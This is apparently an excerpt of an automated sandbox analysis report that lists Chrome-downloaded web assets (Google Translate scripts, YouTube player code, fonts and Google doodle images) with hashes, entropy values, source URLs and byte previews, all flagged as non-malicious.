                                                                                                                                                                                                                                                            Preview:<svg id="help" width="24" height="24" viewBox="0 0 24 24" xmlns="http://www.w3.org/2000/svg"><path fill="#5f6368" d="M12 2C6.48 2 2 6.48 2 12s4.48 10 10 10 10-4.48 10-10S17.52 2 12 2zm1 17h-2v-2h2v2zm2.07-7.75l-.9.92C13.45 12.9 13 13.5 13 15h-2v-.5c0-1.1.45-2.1 1.17-2.83l1.24-1.26c.37-.36.59-.86.59-1.41 0-1.1-.9-2-2-2s-2 .9-2 2H8c0-2.21 1.79-4 4-4s4 1.79 4 4c0 .88-.36 1.68-.93 2.25z"></path></svg>.
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1511)
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):188345
                                                                                                                                                                                                                                                            Entropy (8bit):5.451455221029642
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:1536:xLo5QBj8EPezIRzBNdQlXX9Bk8uXzKFvyZ8PnPaoponpuHRLSTrSp1DksapdRLWT:xLoGBHP9fZy5NR3nwAogW6HSDq
                                                                                                                                                                                                                                                            MD5:54B03B264510DC26481F1DA230DD1DC7
                                                                                                                                                                                                                                                            SHA1:2B0E1349686D90E96983127AB11C0EF6A450DCF9
                                                                                                                                                                                                                                                            SHA-256:D9BA534F564F193E82D66370787D89D052CD093FE91A2C0D6453BA356F8A7D89
                                                                                                                                                                                                                                                            SHA-512:5A7F55F3C518D73BB357F2DE6C55F82B069E2CB578E47D35C974D4D4B148EE98DD8B53DEBFAEBDDD59440FE34CB27B10BE227972A492CEAE076289DCDC624E1A
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://translate.google.com/about/static/compiled/index.min.js?cache=2b0e134
                                                                                                                                                                                                                                                            Preview:(function(__wpcc){'use strict';__wpcc.f=__wpcc.f||{};__wpcc.f.scope={};__wpcc.f.createTemplateTagFirstArg=function(a){return a.raw=a};__wpcc.f.createTemplateTagFirstArgWithRaw=function(a,b){a.raw=b;return a};__wpcc.f.arrayIteratorImpl=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}};__wpcc.f.arrayIterator=function(a){return{next:__wpcc.f.arrayIteratorImpl(a)}};.__wpcc.f.makeIterator=function(a){var b="undefined"!=typeof Symbol&&Symbol.iterator&&a[Symbol.iterator];return b?b.call(a):__wpcc.f.arrayIterator(a)};__wpcc.f.arrayFromIterator=function(a){for(var b,c=[];!(b=a.next()).done;)c.push(b.value);return c};__wpcc.f.arrayFromIterable=function(a){return a instanceof Array?a:__wpcc.f.arrayFromIterator(__wpcc.f.makeIterator(a))};__wpcc.f.ASSUME_ES5=!1;__wpcc.f.ASSUME_NO_NATIVE_MAP=!1;__wpcc.f.ASSUME_NO_NATIVE_SET=!1;__wpcc.f.SIMPLE_FROUND_POLYFILL=!1;.__wpcc.f.ISOLATE_POLYFILLS=!1;__wpcc.f.FORCE_POLYFILL_PROMISE=!1;__wpcc.f.FORCE_POLYFILL_PROMISE_W
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):455
                                                                                                                                                                                                                                                            Entropy (8bit):5.245030472254744
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:12:k6El6qF56uvytxKLoD0IZemBDHhimBDIyYpkbRNkN0:k6Pq769txKLoHgk1PBMyXrkK
                                                                                                                                                                                                                                                            MD5:D5F514B9CA75F62EB23243BD126E7E8A
                                                                                                                                                                                                                                                            SHA1:E00FEC6FA5353A0C6C79FA082613F7710398F063
                                                                                                                                                                                                                                                            SHA-256:E2A58A4AE1E9F561A448C1BE4FD1AEB577373023C09CEDDAA481957B996EFA0E
                                                                                                                                                                                                                                                            SHA-512:406C24BDD34ACB29E99D73D9D33B2F0D1D375C9773A12B82BF2406F427DD72788603077CC46DC81741F6D790D76C934892A60FE6A151237885D892AA4D4A8D8C
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:"https://www.gstatic.com/_/mss/boq-translate/_/js/k=boq-translate.TranslateWebserverUi.en.t7_VRwG1YCg.es5.O/ck=boq-translate.TranslateWebserverUi.3Kpn12MAoRc.L.B1.O/am=gemZDQsCAQg/d=1/exm=A7fCU,AJZZxc,AKLKy,AV6dJd,BSwBZd,BVgquf,CHCSlb,COQbmf,CTfTTd,CW8lw,DFTXbf,E2VjNc,EEDORb,EF8pe,EFQ78c,FZTbYc,G0j0Je,GILUZe,GSlykd,GiFjve,Gkrb3e,HgVFRb,HruX3d,HwavCb,I6YDgd,IZT63,Id96Vc,IjTJJb,Izs65d,JE2clc,JH2zc,JNcm2e,JNoxi,JPvYpc,JVNQkc,JWUKXe,K4PcAe,KG2eXe,KOuY1b,KUM7Z,L1AAkb,LEikZe,LFynkb,LP4cEc,M2suMc,MDB2J,MI6k7c,MJWMce,MY2OBe,MaBk4,Mlhmy,MnwvSb,MpJwZc,N2mfec,NotTJb,NufREb,NwH0H,O1Gjze,O6y8ed,OTA3Ae,OmgaI,P6Sgne,PJgxJf,PrPYRd,QIhFr,QKK0O,Qnj3Pe,QqJ8Gd,R6UQsc,RAnnUd,RMhBfe,RqjULd,Ru0Pgb,SNtCZb,SdcwHb,SpsfSb,T8kZcd,TJQ3Ud,Tpj7Pb,TzmfU,U0aPgd,UECOXe,UUJqVe,UWMmZb,Uas9Hd,UfGXTd,Ulmmrd,Un38xf,UthHZe,V3dDOb,V8JnLd,VETAO,VNcg1e,VwDzFe,WCciof,WO9ee,WYNSOe,XBRlNc,XMsnSd,XVMNvd,Xn16n,YrN4Fb,ZH8ved,ZbunN,ZfAoz,ZwDk9d,_b,_r,_tp,a4GDlb,aW3pY,aurFic,bD99Db,bTi8wc,bYHiff,bm51tf,byfTOb,cPVRG,ceo3ne,dmy0Zb,duFQFc,eM1C7d,eYJrS,ehH0Pd,fKBXPe,fKUV3e,fR6Vdb,ff8rzd,fmklff,g8fAWe,gJzDyc,gWGePc,glibvb,gychg,hB8iWe,hKSk3e,hPAkKe,hc6Ubd,hmxKAd,i5dxUd,j4UNFc,jMem0b,jl0Zdc,kWgXee,kjKdXe,lWpni,lazG7b,lsjVmc,lwddkf,m9oV,mI3LFb,mNvcvf,mdR7q,mmcjze,mzzZzc,n391td,n73qwf,nKuFpb,onWwzb,ovKuLd,p8L0ob,pKzUve,pjICDe,pvoWvc,pw70Gc,q0xTif,qRXAtf,rCcCxc,rPRh8e,rQ304,rSlV0d,s2VbJb,s2XCRc,s39S4,sGhhBd,sJhETb,sOXFj,soHxf,t1sulf,tQX3bd,tQbu0,tjiVBd,u8fSBf,uD1GC,uu7UOe,w9hDv,ws9Tlc,xQtZb,xUdipf,xdp6Ne,xzbRj,yDVVkb,yi1Dad,zbML3c,zr1jrb/excm=_b,_r,_tp,mainview/ed=1/wt=2/rs=ANkVxDlgUx_pEh_72ZiUbycS92nBrlu9eA/ee=cEt90b:ws9Tlc;QGR0gd:Mlhmy;uY49fb:COQbmf;yxTchf:KUM7Z;qddgKe:xQtZb;dIoSBb:SpsfSb;EmZ2Bf:zr1jrb;EVNhjf:pw70Gc;eBAeSb:zbML3c;yEQyxe:p8L0ob;JsbNhc:Xd8iUd;NSEoX:lazG7b;zxnPse:duFQFc;pXdRYb:XBRlNc;oGtAuc:sOXFj;wQlYve:aLUfP;g8nkx:U4MzKc;Pjplud:EEDORb;io8t5d:yDVVkb;Oj465e:KG2eXe;Erl4fe:FloWmf;ul9GGd:VDovNc;sP4Vbe:VwDzFe;a56pNe:JEfCwb;kMFpHd:OTA3Ae;NPKaK:SdcwHb;nAFL3:s39S4;iFQyKf:QIhFr;kbAm9d:MkHyGd;xqZiqf:BBI74;SNUn3:ZwDk9d;LBgRLc:SdcwHb;wR5FRb:O1Gjze/m=xuEY0"
                                                                                                                                                                                                                                                            Preview:"use strict";this.default_TranslateWebserverUi=this.default_TranslateWebserverUi||{};(function(_){var window=this;.try{._.k("xuEY0");.var XS=function(a){_.jw.call(this,a.va)};_.C(XS,_.jw);XS.qa=_.jw.qa;XS.prototype.Hc=function(){return"xuEY0"};XS.prototype.Gd=function(){return!0};XS.prototype.Ic=function(){return _.US};_.iw(_.lsa,XS);_.Dv.xuEY0=_.Vz;._.p();.}catch(e){_._DumpException(e)}.}).call(this,this.default_TranslateWebserverUi);.// Google Inc..
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (537)
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):118663
                                                                                                                                                                                                                                                            Entropy (8bit):5.462950492335707
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3072:c/RKu2n1dKkwn7BQk/T5BlU6bVICniKeuT76L0Xgv:UZI1dKkwn7L/T5BlU6bVICniKeuT76L/
                                                                                                                                                                                                                                                            MD5:6F5B61C134D1F2EF84AE55D1A53DE8F7
                                                                                                                                                                                                                                                            SHA1:D309A767C5563BA4D95C78A96F1D4F669D279358
                                                                                                                                                                                                                                                            SHA-256:72C74F1FF66C5D97926B9661F873CC96286639E7A4F7731F75737667EB13EF86
                                                                                                                                                                                                                                                            SHA-512:B977FCFA455EA9A5B1E9CE28D02D1B7785092803BE879299EE6C430C19611647F5804E12C60B3192A453420BB4B22C8F9B37344E230A7BE8DB5515B1DF40D68A
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://www.youtube.com/s/player/59acb1f3/player_ias.vflset/en_US/remote.js
                                                                                                                                                                                                                                                            Preview:(function(g){var window=this;'use strict';var a8=function(a){g.Qj(a,"zx",Math.floor(2147483648*Math.random()).toString(36)+Math.abs(Math.floor(2147483648*Math.random())^g.Ra()).toString(36));return a},b8=function(a,b,c){Array.isArray(c)||(c=[String(c)]);.g.Vga(a.u,b,c)},mmb=function(a){if(a instanceof g.Cm)return a;.if("function"==typeof a.gk)return a.gk(!1);if(g.Ha(a)){var b=0,c=new g.Cm;c.next=function(){for(;;){if(b>=a.length)return g.N2;if(b in a)return g.Dm(a[b++]);b++}};.return c}throw Error("Not implemented");},nmb=function(a,b,c){if(g.Ha(a))g.Hb(a,b,c);.else for(a=mmb(a);;){var d=a.next();if(d.done)break;b.call(c,d.value,void 0,a)}},omb=function(a,b){var c=[];.nmb(b,function(d){try{var e=g.Vo.prototype.u.call(this,d,!0)}catch(f){if("Storage: Invalid value was encountered"==f)return;throw f;}void 0===e?c.push(d):g.Bla(e)&&c.push(d)},a);.return c},pmb=function(a,b){omb(a,b).forEach(function(c){g.Vo.prototype.remove.call(this,c)},a)},qmb=function(a){if(a.oa){if(a.oa.locationOverri
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=1, software=Picasa], baseline, precision 8, 660x238, components 3
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):205604
                                                                                                                                                                                                                                                            Entropy (8bit):7.70038313909253
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:6144:aRNRNRoD/G3VAW9Zi600000T5Z5+5+5OQlNuJL4:aRNRNRyGFANIIwTL4
                                                                                                                                                                                                                                                            MD5:EED5C6191887EEAE3A7FE2D08DC9E5B4
                                                                                                                                                                                                                                                            SHA1:17C2DDD1E0E82AF7A89AE7938A248177DDD990A0
                                                                                                                                                                                                                                                            SHA-256:B4E331F483ADA93F9059D637EA5E3B5F2B5B363444DAB62EAAA5E95C0923C9E2
                                                                                                                                                                                                                                                            SHA-512:526C2BC33803A11FB49051788269C6F801161384BA00BBB5550C5E2CEA00C928C8C9CE79ED156534EC3159ED58AF5AA492CC6F5B06BE9326EE20EAEA87F1EC83
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://lh3.googleusercontent.com/FhIwYfdhqW6ygU9DnZnr2VCxVaIU6sivlBaa91wIuTB7cox40KZfT2EnyKjdCyute5w1ewVzc3N3G3DWFVngy0kFy2YC9JU7WlwUFmtj=s660
                                                                                                                                                                                                                                                            Preview:......JFIF.............*Exif..II*.......1...............Picasa......ICC_PROFILE......XKCMS....mntrRGB Lab .........2..acspMSFT....KODAsRGB........................KODA................................................A2B0...D...4bXYZ...x....bTRC.......B2A0......jcprt.......Gdmnd...L...wdmdd.......[gXYZ... ....gTRC.......lumi...4....wtpt...H....desc...\...zrXYZ........rTRC.......vued.......Fview...4...$mft2.....................................................g.......6.....Q.......O.(...........-.W.......k.....I.......\ .!.#.$X%.&.(.)A*x+.,.../I0{1.2.4.576d7.8.9.;.<6=^>.?.@.A.C.D:E\F}G.H.I.J.L.M5NQOmP.Q.R.S.T.V.W.X3YIZ_[t\.].^._.`.a.b.d.e.f'g6hEiSj`knlzm.n.o.p.q.r.s.t.u.v.w.x.y.z.|.}.~..........!.$.'.).*.,.-.........-.,.*.).&.$.!..........................................w.l.a.V.K.?.3.'.....................p.a.Q.@.0................~.k.X.D.1..............v.`.J.4.............{.c.J.2............h.M.3...........v.Z.>."...........u.X.:.........g.......6.....Q.......O.(
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:Web Open Font Format (Version 2), TrueType, length 14796, version 1.0
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):14796
                                                                                                                                                                                                                                                            Entropy (8bit):7.982540816037374
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:192:500PiJaGs6M7Ury7W2TYPIJ0BXMx0XKH6k8cfVHULW3Xcc4c9iSUqIcW/40k+H5g:2aeMQxxBX00L2VC+X4chU3cUjHkeW
                                                                                                                                                                                                                                                            MD5:675DF44DB2BAFC60DF7052DA41F6C94B
                                                                                                                                                                                                                                                            SHA1:8B766EB9F1DC9F4F6B6C81028570FD03A5F59509
                                                                                                                                                                                                                                                            SHA-256:8300BA70904617A47A80E9098FE00B3F7AEFD328519318C420289B0BBDFB5E2C
                                                                                                                                                                                                                                                            SHA-512:201864ED71D01588CDADC0BB0E074BD67BF37F8ECF5E570EE87EBC7510CCE70D70DD8979EB170D7560B223B625A0A2BBFA8985E637AE0389EDA25C3134CA8F93
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://fonts.gstatic.com/s/googlesanstext/v21/5aUu9-KzpRiLCAt4Unrc-xIKmCU5qEp2iw.woff2
                                                                                                                                                                                                                                                            Preview:wOF2......9........$..9p..........................".....(.`........P........6.$.... .....%..........*}.i6.....T..F!.'....sr2..{`..:.K..".....BZ.[p.B..l..<...iX...t..bo.+X..s.K...k/6..!/...A.K.....uT.;q. *ZE.J.z.:.p.3.m.Or....~..3.|..x..3.H.Yt.Lhf...w...{...S.eP............'L.F.....,...aT..A./V~D......~.Y.....}.}.f....K.........m.s.l..`.O@#..0..#>w.H.5pW..9....u.cZ.p.................X...$t..=7...J:UQ...j.|}..=.,]..|...`0H...g...miX.g.v.7...!.....8..",...El..*.Al..N.F......H.....s.L...R..z..G..>Ij..i..s.k[.....KK..x....2./z....._2H..d.O..`.e/..:.=.Ry.l...L..a.t@...Pv......1q.^.a~<..R..1..4.p.3..h.....M.s..`X.0........@-.KH6=..E...6...<.( ...VV.^.`.'.<.......?.=L#4"%^|-"....IR.uM,..n....Z1.l..|r..n.%r..Z.........!.........&7....L..z....m~/C7L"..L...B...n"((.....z..FM..\..Q.W.p}G.[8..+X..x.a..""X"..^........z.5"......o.....l...Mi[....:....F@..}h.?!.....y[<j5..p./...#..d......M..^....S7.0i..C..[.z.>..=Q....V.N9]...4.9....g]Q.'.'..,.X.....W
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (2474)
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):73413
                                                                                                                                                                                                                                                            Entropy (8bit):5.410761481937969
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:768:9Qx3AWo/E5k7lMPRHqUR8WBFPKsQEk0ZjRrqFDIwW7vcD5owgevczB49d+ab1UPa:e51KlWBRzQEkIqucK2+Qd+OmfgNNV/Z
                                                                                                                                                                                                                                                            MD5:307D500991EA945B1A733EAFE09080EA
                                                                                                                                                                                                                                                            SHA1:2FC5BCD3F95B9FFFED5B38C6E48A3BB22FE11B3E
                                                                                                                                                                                                                                                            SHA-256:BC51A865E293B19B077CD0317AE85865A427A9D9AC8ED024FE138C5C3C40D0E4
                                                                                                                                                                                                                                                            SHA-512:34B71D03C854EFA9D707295466E5688E39373DE20F37EC13DAB2CD79B79ADF5030B033DA14C96FA89C780B0DED7DA12F306810CBE363B416B043B651932EBDBF
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://www.gstatic.com/_/translate_http/_/js/k=translate_http.tr.en_GB.L2UMboe2Sos.O/d=1/rs=AN8SPfrfz9oes55rtrO8iYIyVkfFf1ruKw/m=corsproxy
                                                                                                                                                                                                                                                            Preview:"use strict";this.default_tr=this.default_tr||{};(function(_){var window=this;.try{./*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/./*.. SPDX-License-Identifier: Apache-2.0.*/.var ba,ea,ja,ra,xa,Aa,Pa,Sa,Ta,Ua,Va,ab,bb,cb,db,eb,fb,hb,ib,mb;_.aa=function(a,b){if(Error.captureStackTrace)Error.captureStackTrace(this,_.aa);else{var c=Error().stack;c&&(this.stack=c)}a&&(this.message=String(a));void 0!==b&&(this.cause=b)};ba=function(a){_.r.setTimeout(function(){throw a;},0)};_.ca=function(a){a&&"function"==typeof a.U&&a.U()};ea=function(a){for(var b=0,c=arguments.length;b<c;++b){var d=arguments[b];_.da(d)?ea.apply(null,d):_.ca(d)}};ja=function(){!_.fa&&_.ha&&_.ia();return _.fa};._.ia=function(){_.fa=(0,_.ha)();ka.forEach(function(a){a(_.fa)});ka=[]};_.na=function(a){_.fa&&la(a)};_.pa=function(){_.fa&&oa(_.fa)};ra=function(a,b){b.hasOwnProperty("displayName")||(b.displayName=a);b[qa]=a};_.ta=function(a,b){return 0<=sa(a,b)};_.ua=function(a,b){_.ta(a,b)||a.
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:PNG image data, 512 x 306, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):17075
                                                                                                                                                                                                                                                            Entropy (8bit):7.906020822136208
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:384:WOCCyGEZo5LFr8LiLfL/cZK/5a55o8v8Zd1oK7PZ0gACrIjp1Xl:iZo5LFr8LC/cZK/5a5WC8XWljpdl
                                                                                                                                                                                                                                                            MD5:9EDD62E09811D37B3F46E4121DC42A13
                                                                                                                                                                                                                                                            SHA1:83DD6D14E786B7F4C9FF343313DACF667043728B
                                                                                                                                                                                                                                                            SHA-256:5A99E53400B256C7C1391EADFBEB0FFD39FA9A46B171FC942B9D48EA10C3F898
                                                                                                                                                                                                                                                            SHA-512:B459612AC38209C893E4EF59F7F6172230DB6B7FF0A682EF868046425C155FA1460D6716FB7AD99DD19982F5EBE2B990D2F0A45A428D73B3BB04C4837F00E635
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Preview:.PNG........IHDR.......2......"h.....sBIT....|.d... .IDATx...w.\e....}..%...(..".H'.....(H...>..?P........b.I/J..E..HQ...&!......s...g'....L.=.....L...u.....|{.p.......f.].!"""R.18.I:..O.R.1.........M.;s.\g..T.EDD..cV.y".. .....X..|............4d.!......1....` .......L_.."..r.13.._Q.........r.N......~B"""R=..%...}.6k.@DDd..v.8C&..Z.....pqT.EDD.........S.....!......R.....!......R.....!......R.....!......R.....!......R.....!......R.....!......R.....!......R.....!......R.....!......R.....!......R.....!......R.....!......R.....!......R.....!......R.....!......R.....!......R.....!......R.....!......R.....!......R.....!......R.....!......R.....!......R.....!......R.....!......R.....!......R.....!......R.....!......R.....!......R.....!......R.....!......R.....!......R.....!......R.....!......R.....!......R.....!......R.....!......R.....!......R.....!......R.....!......R.....!......R.....!......R.....!......R.....!......R.....!......R......H..@..q..T.].....`L./.1....P..|?..o-.
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 512x288, components 3
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):55071
                                                                                                                                                                                                                                                            Entropy (8bit):7.9855086843361205
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:1536:A5FlH0nIlHG/om4W28NTCFkAmD+60ExHPY/gbwqTEXY/0ZwAN:KDdaomxxUFkA8p0fGTI40CAN
                                                                                                                                                                                                                                                            MD5:D345F3E99F2F2D3307D44D6BF232687D
                                                                                                                                                                                                                                                            SHA1:E155B5E28A82C8EB267F4869A7CF45F23AD37CF7
                                                                                                                                                                                                                                                            SHA-256:49B436D79C72E16A01B1EC23D6AECADD7077A6143DB7C403A3BC500796EA455B
                                                                                                                                                                                                                                                            SHA-512:D1396CDBFD41E7C9178F43DFBCC16D890281B5208F959901DD9785B0999DE15C757C15DED8641A2A3DB508B3518320E28D2729E1F40BDC789D072FFA0908216A
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Preview:......JFIF...................................................................................................................................................... ..............................................J........................!.1A.."Qa.2q...#B....R..3b..$r....4CSs..........................................:........................!1A.Qa.."q...2.#B.....3Rb.Cr...S............?....Cgs.. .S.~.......BQ.....BY......}~...Y..,.....!.W>g...!.?\[ ....A;..~..;.>.\B.$>.\B...3..!...?\B.$>g.BI..oe;5....".........q.<H|..\@..O..,F....*.......J|....ps.J..}~..........3.....k.......C...~..;.>g.A.S.~..........('..........5.>d.J.Q....B........!....+.|....q..t......N....!............!............!..C\....3.>g. .!.8.A;..qD;..?\B...3..!...?\B..C.~..A....#I.q.'x|......O...3.?...w...q.wx|.......!.#...c.!...l..r5..&....+p......(./...).,~.B...U....6........BV..B.$...J..Q.b...!..b.LB..W..... .B.x...Q...Y..@.t=N.M.{.|.. .1.O...Y...B2..E.. .X.!.v.Q..C...A{..]...(.b..hQ...q6..X+.
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:PNG image data, 898 x 440, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):134112
                                                                                                                                                                                                                                                            Entropy (8bit):7.9914969556323285
                                                                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                                                                            SSDEEP:3072:06r8uVET6f6L4a3pbrJSL7j8GbOzm9zu6e1PDH:06r8u/6V5btCoKOzie1LH
                                                                                                                                                                                                                                                            MD5:0950B67A574AB493543AC9385AA61123
                                                                                                                                                                                                                                                            SHA1:919CD2BD3A24538417A70F97973ED9A8CF18DA9C
                                                                                                                                                                                                                                                            SHA-256:004ACF195C8386C88C23D72E52EF903D30919871322935DEEBE9C0B63EBBBDF5
                                                                                                                                                                                                                                                            SHA-512:5BAACAB7956D25BAB8250611F8041F7F20322E45311B7A03E5C2050A5C08BA03BE062B01E3790A6ADF828D2006621FB635FD9F3D098D73CFCD0B8498F2C1B90A
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://www.google.com/logos/doodles/2019/spring-equinox-2019-northern-hemisphere-5139135894388736-2x.png
                                                                                                                                                                                                                                                            Preview:.PNG........IHDR.............'.......PLTE........................................}..=YX2<?.*-.#'."%.),#8=aik8AD<HJVdeu{}./3.%)(16KTW.,/krt.15DMP!6;-6:!12R[].').38)7A!56.+/#=F%97.-1$-1.',.'*.!$. #.$'!*-.#&.. .%)."&."$..!."%.!#&BN..!..#....."(JU)?:U.y`...."o..1H=".'$6+(?/*:+5F.,E11@,9K/<N0 %$ad.?Q0AT1J9Y16GCV1EX1<8OFZ1LW3:Q>GR1IK/@C-VT1O]5IC-:9*,+'[X2CL/PO0&(%\=d04*c\4Vb7n?tA;,WJ3e]GojGHH>.}T.e.l..W..r..V._z._..e..TiaR9.sP.q..o..r..r.E_D..\]g6OB0u]A.B.lY;.gEcl870(=1)....{.2,'...J<-.D.eN3^I1`f@.......\F0aK2..\..t...XP@XD0..hU@/cM3hq9...A3*..QR=-.|.L8+O:,J6+E4*H6+L7+.J.9.l-.Z&.N ~F.lB8.D6.X@.[A.R=w.C..E..Dr.SRpI..J..Q..V..\..Wb.M.._..a..d..i.._..^..\..i..Z..Y..e..y..oz.{4[.b..z../R|<i.+Jk?n.Fw.W..@u.At.M..7a.?r.Av.Ar.Dx.[l.@t.Dw.I{.An.Dy.Bi.Bc.B[.9l.CT....]....l.......s.......R...x......./v.W....IDATx.....0......{.3.R...............................1..K....G.)..FL....{..O.)../..Uu-..)4..s$..&@.AtFt+..........zz...4....x...8.....e.?......S..,U.'.......#P....$^<....a.^..3..
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:GIF image data, version 89a, 1000 x 400
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):883280
                                                                                                                                                                                                                                                            Entropy (8bit):7.924993338061191
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:24576:fZao9Dk9ss7SXYWG45Yy9pBMgD3lHKMFUWlVAf5K:U2Drs7+G4eqpBMmVqM1Af5K
                                                                                                                                                                                                                                                            MD5:5E47F7881BDAE68D3AE95E13E643CAF6
                                                                                                                                                                                                                                                            SHA1:6C7297B024AA331B589C809564491BA43A44EC94
                                                                                                                                                                                                                                                            SHA-256:1D65362BAA4D05A7166337FD0AA916D9A56CACD03323A4EDB1FB824C74C7009F
                                                                                                                                                                                                                                                            SHA-512:2B0A1B165262D711D8AF2F8F070A3D30B8E24352C9C195DA4ACF4C2C431DF2CCB0C441CC6FE19BD342F7CD1F029CCFF74137A55891495BE8715BC3163846BF62
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://www.google.com/logos/doodles/2021/spring-2021-northern-hemisphere-6753651837108891-2xa.gif
                                                                                                                                                                                                                                                            Preview:GIF89a............8..i..F.kh...Lt.(m...F..E..wNp...3.r.n....M...SF..2.........1r..D....yw.$..T....h....q...U....5e.......3...Ge.....I.....f.X.JB..7..v..Z.....7..E.iRy.2..l_....7S...s7....#..n..."..Um.#......T..........B..Iy.0...V...e1...n...5G......WU.(9......$.G...\....5..,..'..w..j..-.u.6.. .j.#..$.cV...@....-.85...j...B.v..........ls.*..T.u.Te]J.t.....T....p....g......5?X.F..?1...B.....N..I.."..BU...B;......U/.5..Y....k.v>..;........:.......xx..G.......f.9..[..F.......4..X..[..$..............SF..f.....U9uJ..B?a..vZ."...R.......T..............T....k.)..Z..z.......ZL..1..m.6.`j..=.."..|....Q....".9BT.....B.M......"Z...^_............I........................................... .......................................S.....!..NETSCAPE2.0.....!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c005 79.164590, 2020/12/09-11:57:44 "> <rdf:RDF xmlns:rdf="ht
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):401
                                                                                                                                                                                                                                                            Entropy (8bit):4.740133908247468
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:12:tvcmdU/i3tLIsKd2aCJNfOQxNVtd7Svq6JwCA7V:tk2U/i3tv46vxNdSvqCw9V
                                                                                                                                                                                                                                                            MD5:E2DBF6370751567D561BB64649CB3342
                                                                                                                                                                                                                                                            SHA1:42792B6B81D2386B95F295CA7473C929CFE4FB0C
                                                                                                                                                                                                                                                            SHA-256:C1BD37E48A2AFA7523AED613951F5411A03DC1597344A9639DDAA4EFF32F0D7E
